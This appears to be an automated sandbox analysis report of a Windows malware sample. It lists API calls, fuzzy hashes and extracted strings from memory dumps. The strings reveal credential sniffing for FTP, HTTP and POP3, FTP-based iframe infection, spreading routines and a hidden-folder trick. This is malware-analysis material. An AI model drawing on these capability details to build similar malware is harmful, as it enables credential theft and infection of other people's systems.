                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: c0089952ace360ebcc3e34eb2580965971ac3f93c53b4d4a5c5986bf46cea3ca
                                                                  • Instruction ID: febdc5ac0e38d1c8f41d274fc77bf47f9808ab6730b1dfa3b6492b89c998bcbc
                                                                  • Opcode Fuzzy Hash: c0089952ace360ebcc3e34eb2580965971ac3f93c53b4d4a5c5986bf46cea3ca
                                                                  • Instruction Fuzzy Hash: A9A17FB19006059FCB20DF65CA8086FB7B9FF94314B10853FE586E7780DB38E9418B95
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: c0089952ace360ebcc3e34eb2580965971ac3f93c53b4d4a5c5986bf46cea3ca
                                                                  • Instruction ID: 3b1c0084b12f256ce239e1f2dbe37b5a54488aa8cc27bd0b4d39ea97744b4ec9
                                                                  • Opcode Fuzzy Hash: c0089952ace360ebcc3e34eb2580965971ac3f93c53b4d4a5c5986bf46cea3ca
                                                                  • Instruction Fuzzy Hash: D8A18EB19006059FCB22DFA5D9C086FB7F9FF98314B11CA6EE5469B608DB31E901CB61
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036F9FF
                                                                  • GetLogicalDriveStringsA.KERNEL32 ref: 0036FA22
                                                                  • lstrcatA.KERNEL32(00000000,00373040), ref: 0036FA5C
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F459
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F472
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F48B
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F4A4
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F4BD
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F4D6
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F4F2
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F50B
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F526
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F541
                                                                    • Part of subcall function 0036F430: memset.MSVCRT ref: 0036F55C
                                                                    • Part of subcall function 0036F430: sprintf.MSVCRT ref: 0036F571
                                                                    • Part of subcall function 0036F430: sprintf.MSVCRT ref: 0036F586
                                                                    • Part of subcall function 0036F430: wsprintfW.USER32 ref: 0036F5A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: memset$sprintf$DriveLogicalStringslstrcatwsprintf
                                                                  • String ID:
                                                                  • API String ID: 563256260-0
                                                                  • Opcode ID: 8ea4098c29b3b19f6c80006f22f617f2e99f747f93eb6427672a10c4c5a6d508
                                                                  • Instruction ID: 6bda8b0900d93b91daff48e03b3481886123affa712e9759098cd1d3ea3897d8
                                                                  • Opcode Fuzzy Hash: 8ea4098c29b3b19f6c80006f22f617f2e99f747f93eb6427672a10c4c5a6d508
                                                                  • Instruction Fuzzy Hash: F3115EB5901349AEDB22DBB4EC41FEAB7789F14304F0480B9E94CA7146E5B05B0DCB61
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00408B6E
                                                                  • EncryptMessage.SECUR32(?,00000000,?,00000000,?,?,?), ref: 00408C29
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: EncryptMessagememset
                                                                  • String ID:
                                                                  • API String ID: 3924230039-0
                                                                  • Opcode ID: e2ab3e0427d67a117949027b41559f788fb6a7f02857e0614c7bc85d79e661e5
                                                                  • Instruction ID: 187c4bea0345dcc81a1e91117d9d58187b68109648b59adc59adcf4ae98d03d5
                                                                  • Opcode Fuzzy Hash: e2ab3e0427d67a117949027b41559f788fb6a7f02857e0614c7bc85d79e661e5
                                                                  • Instruction Fuzzy Hash: 5D410BB1D01208EFCB50CFA9D981ADEBBF5EF88314F14852EE849E7341D774AA458B94
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00368B6E
                                                                  • EncryptMessage.SECUR32(?,00000000,?,00000000,?,?,?), ref: 00368C29
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: EncryptMessagememset
                                                                  • String ID:
                                                                  • API String ID: 3924230039-0
                                                                  • Opcode ID: e2ab3e0427d67a117949027b41559f788fb6a7f02857e0614c7bc85d79e661e5
                                                                  • Instruction ID: b61f3d4e1aedb6f2827acecde45dbe0953f7d338cc181ab8d833437bb09d93ae
                                                                  • Opcode Fuzzy Hash: e2ab3e0427d67a117949027b41559f788fb6a7f02857e0614c7bc85d79e661e5
                                                                  • Instruction Fuzzy Hash: E8411EB1D01208EFCB11CFA9D981ADEBBF5FF88314F14852AE849E7204D770AA45CB90
                                                                  APIs
                                                                  • WriteFile.KERNEL32(00000000,?,00008000,?,00000000), ref: 00369E8D
                                                                  • DeviceIoControl.KERNEL32(00000000,0009001C,00000000,00000000,00000000,00000000,?,00000000), ref: 00369EA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ControlDeviceFileWrite
                                                                  • String ID:
                                                                  • API String ID: 564257829-0
                                                                  • Opcode ID: 8a8d713ac8bbe28bcd855ce0ac5e891d2b9d2a39c4c4b13159d5c3b48d242ba3
                                                                  • Instruction ID: e2080bde2903acd5c0182994c92314af4119ce9e7050c601c551be7b812557b5
                                                                  • Opcode Fuzzy Hash: 8a8d713ac8bbe28bcd855ce0ac5e891d2b9d2a39c4c4b13159d5c3b48d242ba3
                                                                  • Instruction Fuzzy Hash: EFE0C2F2210108BDF620C2949D81FFB371CD784711F100193FD09D0080D961AD4497B0
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00362D43,?,00000100,?,(m7,?,?,00365730,?,00008000,?,00000000), ref: 0036384F
                                                                  • HeapReAlloc.KERNEL32(00000000,?,00362D43,?,00000100,?,(m7,?,?,00365730,?,00008000,?,00000000,00000000,?), ref: 00363856
                                                                    • Part of subcall function 00363810: GetProcessHeap.KERNEL32(00000000,00000000,?,00364046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00363819
                                                                    • Part of subcall function 00363810: HeapAlloc.KERNEL32(00000000,?,00364046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00363820
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: f8359e7331deb651205373da72dfd739c5a8e68fdb34e468dec3666a4957e540
                                                                  • Instruction ID: 2625e6aabad2cf0ab874c2cfe11ec0a241e65037edebf17b23120b3c1ad8e8b2
                                                                  • Opcode Fuzzy Hash: f8359e7331deb651205373da72dfd739c5a8e68fdb34e468dec3666a4957e540
                                                                  • Instruction Fuzzy Hash: F1D012B65002086BEB019BA4EC49EAA375C9B04714F448014FA0D8B501D631E9508761
                                                                  APIs
                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00361AE9
                                                                    • Part of subcall function 00361A10: CreateFileW.KERNEL32(?,00000100,00000001,00000000,00000003,?,00000000), ref: 00361A36
                                                                    • Part of subcall function 00361A10: SetFileTime.KERNEL32(00000000,?,?,?), ref: 00361A50
                                                                    • Part of subcall function 00361A10: CloseHandle.KERNEL32(00000000), ref: 00361A59
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FileTime$CloseCreateHandleSystem
                                                                  • String ID:
                                                                  • API String ID: 489727163-0
                                                                  • Opcode ID: b2e14b774be4cd6c293cc0c603382b1b9a3438024ae1840398883401c2ed36ca
                                                                  • Instruction ID: 57f4263df51c766d937934ddecf4d5785fa10fb2a9ff2bbebd84f47e4d3221d8
                                                                  • Opcode Fuzzy Hash: b2e14b774be4cd6c293cc0c603382b1b9a3438024ae1840398883401c2ed36ca
                                                                  • Instruction Fuzzy Hash: 0911DEB6D10228BBCB05EFD4DC81EEEB77CAB58B00F04854AB615E7145E670A704CBA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 74ab7da85d1484886710da23cc53855dd25be7a8e112030da8bc2f05dc99f62e
                                                                  • Instruction ID: 219b0fc98e8f073de552917feaf8e62aac511575ba6e78677fee7b87815c9be5
                                                                  • Opcode Fuzzy Hash: 74ab7da85d1484886710da23cc53855dd25be7a8e112030da8bc2f05dc99f62e
                                                                  • Instruction Fuzzy Hash: BA014F322B5D0E49C75E451C1A2CABB12020F56B597D4463A4AC2F07D4EDFEEC43D08D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 82c71bca018e55767288fbc09d243066027f6e76293dfe47211a1aefeaf2a69d
                                                                  • Instruction ID: a524b2347caae6757859291ebfb8d3e984afe2170a5e06bc67021da95be79e99
                                                                  • Opcode Fuzzy Hash: 82c71bca018e55767288fbc09d243066027f6e76293dfe47211a1aefeaf2a69d
                                                                  • Instruction Fuzzy Hash: 500112722B5D0E48C75F451C4814ABB12094F56B96B97C6389EE2D47ECDDDAEC43D084
                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000800), ref: 0040D7C3
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000800), ref: 0040D7D2
                                                                  • memset.MSVCRT ref: 0040D7EE
                                                                  • HeapFree.KERNEL32(?,?,00000000), ref: 0040D80B
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040D819
                                                                  • GetLastError.KERNEL32 ref: 0040D82F
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040D83C
                                                                  • GetLastError.KERNEL32 ref: 0040D852
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040D85B
                                                                  • ReadFile.KERNEL32(?,00000000,00000800,00000000,00000000), ref: 0040D87A
                                                                  • atoi.MSVCRT(00000000), ref: 0040D8D3
                                                                  • strchr.MSVCRT ref: 0040D8E8
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0040D900
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001), ref: 0040D924
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001), ref: 0040D930
                                                                  • strchr.MSVCRT ref: 0040D93F
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040D952
                                                                  • lstrcpynA.KERNEL32(00000000,00000001,00000000), ref: 0040D95E
                                                                  • lstrcpynA.KERNEL32(?,00000000,00000001), ref: 0040D96D
                                                                  • lstrcmpA.KERNEL32(?,ftplog), ref: 0040D97F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocFree$ErrorLastlstrcpynlstrlenstrchr$FileReadatoilstrcmpmemset
                                                                  • String ID: 0WA$30e44aa1$4WA$8WA$<WA$@WA$FTP -> $POP3 -> $[DNS]: Blocked DNS "%s"$[FTP Infect]: %s was iframed$[FTP Login]: %s$[HTTP Login]: %s$[HTTP Traffic]: %s$[HTTP]: %s$[MSN]: %s$[PDef+]: %s$[POP3 Login]: %s$[Ruskill]: Detected DNS: "%s"$[Ruskill]: Detected File: "%s"$[Ruskill]: Detected Reg: "%s"$blk$block$disable$dns$ftpinfect$ftplog$httplogin$httpspread$httptraff$msn$poplog$rdns$rreg$ruskill
                                                                  • API String ID: 1531277263-343948886
                                                                  • Opcode ID: 226946bfaaa6e499b063feb038c8fac31a3ab4f314e31c634eed55588fe6e7b0
                                                                  • Instruction ID: 93a879a63f9d5e1309c0a058911fb680e789185c1f282c53cedf1341369c8508
                                                                  • Opcode Fuzzy Hash: 226946bfaaa6e499b063feb038c8fac31a3ab4f314e31c634eed55588fe6e7b0
                                                                  • Instruction Fuzzy Hash: B2E12771A40604BBE71067A59C46FFF762CEF89705F21803AFA15B22D1DBB89D04C6AD
                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000800), ref: 0036D7C3
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000800), ref: 0036D7D2
                                                                  • memset.MSVCRT ref: 0036D7EE
                                                                  • HeapFree.KERNEL32(?,?,00000000), ref: 0036D80B
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036D819
                                                                  • GetLastError.KERNEL32 ref: 0036D82F
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036D83C
                                                                  • GetLastError.KERNEL32 ref: 0036D852
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036D85B
                                                                  • ReadFile.KERNEL32(?,00000000,00000800,00000000,00000000), ref: 0036D87A
                                                                  • atoi.MSVCRT(00000000), ref: 0036D8D3
                                                                  • strchr.MSVCRT ref: 0036D8E8
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0036D900
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001), ref: 0036D924
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001), ref: 0036D930
                                                                  • strchr.MSVCRT ref: 0036D93F
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036D952
                                                                  • lstrcpynA.KERNEL32(00000000,00000001,00000000), ref: 0036D95E
                                                                  • lstrcpynA.KERNEL32(?,00000000,00000001), ref: 0036D96D
                                                                  • lstrcmpA.KERNEL32(?,ftplog), ref: 0036D97F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocFree$ErrorLastlstrcpynlstrlenstrchr$FileReadatoilstrcmpmemset
                                                                  • String ID: 0W7$30e44aa1$4W7$8W7$<W7$@W7$FTP -> $POP3 -> $[DNS]: Blocked DNS "%s"$[FTP Infect]: %s was iframed$[FTP Login]: %s$[HTTP Login]: %s$[HTTP Traffic]: %s$[HTTP]: %s$[MSN]: %s$[PDef+]: %s$[POP3 Login]: %s$[Ruskill]: Detected DNS: "%s"$[Ruskill]: Detected File: "%s"$[Ruskill]: Detected Reg: "%s"$blk$block$disable$dns$ftpinfect$ftplog$httplogin$httpspread$httptraff$msn$poplog$rdns$rreg$ruskill
                                                                  • API String ID: 1531277263-1300064085
                                                                  • Opcode ID: db6ba5268b1a73ff2f50484ae9ddc0366b6b19cda26393d09d526b6fd9997f64
                                                                  • Instruction ID: 68c2467bdba1e249cd07bffd2784bfbfdd79010f791feb64c3beef2f6a80a50e
                                                                  • Opcode Fuzzy Hash: db6ba5268b1a73ff2f50484ae9ddc0366b6b19cda26393d09d526b6fd9997f64
                                                                  • Instruction Fuzzy Hash: 50E13876B40605BBE7335BA89C4AFBF776CEF86700F51C004F909A6295DBA49C40DBA1
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,756F59EB), ref: 00410446
                                                                  • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0041044C
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00410453
                                                                  • memset.MSVCRT ref: 0041048B
                                                                  • GetProcessHeap.KERNEL32 ref: 00410493
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 004104A9
                                                                  • sscanf.MSVCRT ref: 004104C5
                                                                  • strstr.MSVCRT ref: 004104DC
                                                                  • lstrlenA.KERNEL32(00402780), ref: 004104F0
                                                                  • lstrlenA.KERNEL32(?), ref: 004104FA
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 00410505
                                                                  • strtok.MSVCRT ref: 0041051B
                                                                  • lstrcpyA.KERNEL32(00000000,00411335), ref: 00410534
                                                                  • _memicmp.MSVCRT ref: 00410557
                                                                  • lstrlenA.KERNEL32(00402780), ref: 00410567
                                                                  • _snprintf.MSVCRT ref: 0041057B
                                                                  • _memicmp.MSVCRT ref: 00410596
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 004105A7
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 004105F1
                                                                  • lstrcatA.KERNEL32(00000000,00412B84), ref: 004105F9
                                                                  • strtok.MSVCRT ref: 00410602
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0041061C
                                                                  • lstrcatA.KERNEL32(00000000,), ref: 00410624
                                                                  • lstrcatA.KERNEL32(00000000,00402780), ref: 0041062B
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0041062E
                                                                  • _snprintf.MSVCRT ref: 00410646
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0041064F
                                                                  • lstrlenA.KERNEL32(?), ref: 0041065A
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000040), ref: 00410667
                                                                  • _snprintf.MSVCRT ref: 00410688
                                                                  • sscanf.MSVCRT ref: 004106A0
                                                                  • strstr.MSVCRT ref: 004106B7
                                                                  • strstr.MSVCRT ref: 004106D2
                                                                  • lstrlenA.KERNEL32(00000000), ref: 004106E6
                                                                  • lstrlenA.KERNEL32(-00000002), ref: 004106F3
                                                                  • HeapAlloc.KERNEL32(?,00000008,?), ref: 004106FF
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410714
                                                                  • lstrlenA.KERNEL32(-00000002), ref: 00410721
                                                                  • lstrcpynA.KERNEL32(?,-00000002,?), ref: 0041072C
                                                                  • lstrlenA.KERNEL32(?), ref: 00410736
                                                                  • lstrlenA.KERNEL32(00402780), ref: 0041073E
                                                                  • HeapAlloc.KERNEL32(?,00000008,?), ref: 0041074B
                                                                  • lstrlenA.KERNEL32(?,?,00402780), ref: 00410761
                                                                  • lstrlenA.KERNEL32(00402780), ref: 0041076A
                                                                  • _snprintf.MSVCRT ref: 00410787
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0041079F
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 004107AC
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 004107B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$lstrcat$Alloc$_snprintf$Freestrstr$Process_memicmplstrcpysscanfstrtok$lstrcpynmemset
                                                                  • String ID: $%s%s$Content-Length: $Content-Length: %d$From: $MSG %d %1s$MSG %d %s %d%s%s$Reliability: $SDG $SDG $SDG %d$SDG %d %d$X-MMS-IM-Format:
                                                                  • API String ID: 375969099-2909086048
                                                                  • Opcode ID: 37cc3c8f1d7efab5335082757353a03a82e25d8d8234addcd3faba9dbf623912
                                                                  • Instruction ID: f5f8fd790bcaf9c40db7213d0d9bd0d66c8d2255c156342998f8a5311ef5fb81
                                                                  • Opcode Fuzzy Hash: 37cc3c8f1d7efab5335082757353a03a82e25d8d8234addcd3faba9dbf623912
                                                                  • Instruction Fuzzy Hash: FCA158B1A40309BBDB10DBA58D85EFF777DEB48704F14455AFA14E3241DAB8DE808B68
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,756F59EB), ref: 00370446
                                                                  • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0037044C
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00370453
                                                                  • memset.MSVCRT ref: 0037048B
                                                                  • GetProcessHeap.KERNEL32 ref: 00370493
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 003704A9
                                                                  • sscanf.MSVCRT ref: 003704C5
                                                                  • strstr.MSVCRT ref: 003704DC
                                                                  • lstrlenA.KERNEL32(00362780), ref: 003704F0
                                                                  • lstrlenA.KERNEL32(?), ref: 003704FA
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 00370505
                                                                  • strtok.MSVCRT ref: 0037051B
                                                                  • lstrcpyA.KERNEL32(00000000,00371335), ref: 00370534
                                                                  • _memicmp.MSVCRT ref: 00370557
                                                                  • lstrlenA.KERNEL32(00362780), ref: 00370567
                                                                  • _snprintf.MSVCRT ref: 0037057B
                                                                  • _memicmp.MSVCRT ref: 00370596
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 003705A7
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 003705F1
                                                                  • lstrcatA.KERNEL32(00000000,00372B84), ref: 003705F9
                                                                  • strtok.MSVCRT ref: 00370602
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0037061C
                                                                  • lstrcatA.KERNEL32(00000000,), ref: 00370624
                                                                  • lstrcatA.KERNEL32(00000000,00362780), ref: 0037062B
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0037062E
                                                                  • _snprintf.MSVCRT ref: 00370646
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0037064F
                                                                  • lstrlenA.KERNEL32(?), ref: 0037065A
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000040), ref: 00370667
                                                                  • _snprintf.MSVCRT ref: 00370688
                                                                  • sscanf.MSVCRT ref: 003706A0
                                                                  • strstr.MSVCRT ref: 003706B7
                                                                  • strstr.MSVCRT ref: 003706D2
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003706E6
                                                                  • lstrlenA.KERNEL32(-00000002), ref: 003706F3
                                                                  • HeapAlloc.KERNEL32(?,00000008,?), ref: 003706FF
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00370714
                                                                  • lstrlenA.KERNEL32(-00000002), ref: 00370721
                                                                  • lstrcpynA.KERNEL32(?,-00000002,?), ref: 0037072C
                                                                  • lstrlenA.KERNEL32(?), ref: 00370736
                                                                  • lstrlenA.KERNEL32(00362780), ref: 0037073E
                                                                  • HeapAlloc.KERNEL32(?,00000008,?), ref: 0037074B
                                                                  • lstrlenA.KERNEL32(?,?,00362780), ref: 00370761
                                                                  • lstrlenA.KERNEL32(00362780), ref: 0037076A
                                                                  • _snprintf.MSVCRT ref: 00370787
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0037079F
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003707AC
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003707B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$lstrcat$Alloc$_snprintf$Freestrstr$Process_memicmplstrcpysscanfstrtok$lstrcpynmemset
                                                                  • String ID: $%s%s$Content-Length: $Content-Length: %d$From: $MSG %d %1s$MSG %d %s %d%s%s$Reliability: $SDG $SDG $SDG %d$SDG %d %d$X-MMS-IM-Format:
                                                                  • API String ID: 375969099-2909086048
                                                                  • Opcode ID: be52f0853e725a1216d4c3c8296635939dce930f4491a47f95054c8ed5d16452
                                                                  • Instruction ID: 640415462f80565f19ac411b0996135e811611cefd402e2dd0fdab6c511b66c6
                                                                  • Opcode Fuzzy Hash: be52f0853e725a1216d4c3c8296635939dce930f4491a47f95054c8ed5d16452
                                                                  • Instruction Fuzzy Hash: 05A123B6A00209FBDB35DBA48C85EBF77BCEB48710F148555F90CA6241EA78DE449B60
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040F459
                                                                  • memset.MSVCRT ref: 0040F472
                                                                  • memset.MSVCRT ref: 0040F48B
                                                                  • memset.MSVCRT ref: 0040F4A4
                                                                  • memset.MSVCRT ref: 0040F4BD
                                                                  • memset.MSVCRT ref: 0040F4D6
                                                                  • memset.MSVCRT ref: 0040F4F2
                                                                  • memset.MSVCRT ref: 0040F50B
                                                                  • memset.MSVCRT ref: 0040F526
                                                                  • memset.MSVCRT ref: 0040F541
                                                                  • memset.MSVCRT ref: 0040F55C
                                                                  • sprintf.MSVCRT ref: 0040F571
                                                                  • sprintf.MSVCRT ref: 0040F586
                                                                  • wsprintfW.USER32 ref: 0040F5A4
                                                                  • sprintf.MSVCRT ref: 0040F5BC
                                                                  • sprintf.MSVCRT ref: 0040F5D3
                                                                  • sprintf.MSVCRT ref: 0040F5EC
                                                                  • wsprintfW.USER32 ref: 0040F607
                                                                  • wsprintfW.USER32 ref: 0040F61B
                                                                    • Part of subcall function 00401CF0: GetFileAttributesW.KERNEL32(?), ref: 00401CF7
                                                                  • _stricmp.MSVCRT(00000000,ERR), ref: 0040F64B
                                                                  • _stricmp.MSVCRT(0044A920,00000000), ref: 0040F65D
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040F684
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040F692
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040F6A0
                                                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0040F6AA
                                                                  • GetLastError.KERNEL32 ref: 0040F6B4
                                                                  • CopyFileW.KERNEL32 ref: 0040F6CE
                                                                  • lstrlenA.KERNEL32([.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E},00000000), ref: 0040F6DE
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F747
                                                                  • lstrcpyA.KERNEL32(?,0000412F), ref: 0040F7DA
                                                                  • lstrcatA.KERNEL32(?,?), ref: 0040F7EE
                                                                    • Part of subcall function 00401EA0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 00401ECD
                                                                    • Part of subcall function 00401EA0: GetLastError.KERNEL32 ref: 00401EDA
                                                                  • lstrcatA.KERNEL32(?,00412B84), ref: 0040F800
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F813
                                                                  • lstrlenA.KERNEL32(0000412F,?,00000000), ref: 0040F828
                                                                  • WriteFile.KERNEL32(00000000,0000412F,00000000), ref: 0040F837
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F87C
                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F88B
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F8B1
                                                                  • Sleep.KERNEL32(00000032), ref: 0040F8C4
                                                                  • SetFileAttributesA.KERNEL32(?,00000004), ref: 0040F901
                                                                  • SetFileAttributesA.KERNEL32(?,00000004), ref: 0040F93A
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040F97D
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040F984
                                                                  • LockFile.KERNEL32 ref: 0040F98D
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040F9BE
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040F9C5
                                                                  • LockFile.KERNEL32 ref: 0040F9CE
                                                                  Strings
                                                                  Memory Dump Source
